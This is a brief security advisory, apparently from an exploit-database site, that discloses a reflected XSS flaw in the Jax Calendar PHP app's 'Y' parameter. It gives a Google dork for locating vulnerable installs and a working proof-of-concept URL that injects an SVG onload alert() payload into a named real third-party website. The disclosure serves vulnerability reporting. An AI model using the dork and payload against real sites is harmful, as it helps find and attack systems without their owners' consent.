Jax Calendar v1.0 - v1.34 XSS

2018.01.02
us SonnySpooks (US) us
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:"jax_calendar.php"

------------------------------------------- XSS In Jax Calendar v1.0 - v1.34 By SonnySpooks ------------------------------------------- 1. [About App] ------------------------------------------- Jax Calendar is a popular calendar app used on Various sites. ------------------------------------------- 2. [Issue With It] ------------------------------------------- jax_calendar.php Has a Parameter (Y=) which does not sanitize html parses ------------------------------------------- 3. [Replication of attack] ------------------------------------------- http://www.salikum.de/modul/news/jax_calendar.php?Y=%22%3E%3Csvg/onload=alert(1)%3E&m=3&d=4&do=show_event&key=a09d57595d41a89e876b1dbc01a88ee1&cal_id=0&language=english&gmt_ofs=0&view=d30&evt_date=19.02.2017+-%3Cbr%3E31.05.2017&evt_title=Ausstellung+Koki+van+Trotten+aus+Berlin ________ /\ \ / \ \ / \ \ / \_______\ \ / / ___\ / ____/___ /\ \ / /\ \ / \ \/___/ \ \ / \ \ \ \ / \_______\ \_______\ \ / / / / \ / / / / \ / /\ / / \/_______/ \/_______/ -------------------------------------------


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top